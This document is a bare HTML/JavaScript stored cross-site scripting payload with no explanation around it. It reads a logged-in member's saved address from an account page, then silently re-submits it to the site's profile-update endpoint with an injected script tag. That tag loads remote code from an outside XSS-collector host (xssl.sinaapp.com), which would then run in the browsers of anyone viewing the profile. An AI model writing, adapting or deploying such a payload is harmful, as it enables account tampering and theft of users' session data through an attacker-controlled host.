<meta charset="utf8"> <script lnaguage="javascript"> function createRequest(){ var xmlHttp=false; if(window.XMLHttpRequest){ xmlHttp = new XMLHttpRequest(); }else if(window.ActiveXObject){ try{ xmlHttp = new ActiveXObject("Msxml2.XMLHTTP"); }catch(error1){ try{ xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); }catch(error2){ xmlHttp = false; } } } return xmlHttp; } var getAddress; if(getAddress=createRequest()){ getAddress.open("GET","/member/account/basic.asp"); getAddress.onreadystatechange=updatePage; getAddress.send(null); } var xml; function updatePage() { if(getAddress.readyState == 4 ) { if(getAddress.status == 200) { var str = getAddress.responseText; rex = /name="Address" value="(.*)" size="38"/; var ttt = rex.exec(str); if(xml=createRequest()){ xml.open("POST","/cmd/member/setBasic.asp?cmd=set"); xml.onreadystatechange = attack; var body = "areaID=0&provinceID=1&cityID=1&Address="+encodeURI(ttt[1])+"%22%3E%3Cscript%20src%3Dhttp%3A%2F%2Fxssl.sinaapp.com%2F0S3c9D%3F1383890465%3E%3C%2Fscript%3E%3Cinput%20type%3D%22hidden&=&LinkMan=asdf&Tel=12345789&QQ=123456789&=%E4%BF%9D%E5%AD%98%E4%BF%AE%E6%94%B9&"; xml.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xml.send(body); } }else if(getAddress.status==404){ alert("404"); }else { alert("status:"+getAddress.statusText); } } } function attack(){ if(xml.readyState == 4 ){ if(xml.status == 200){ } } } </script>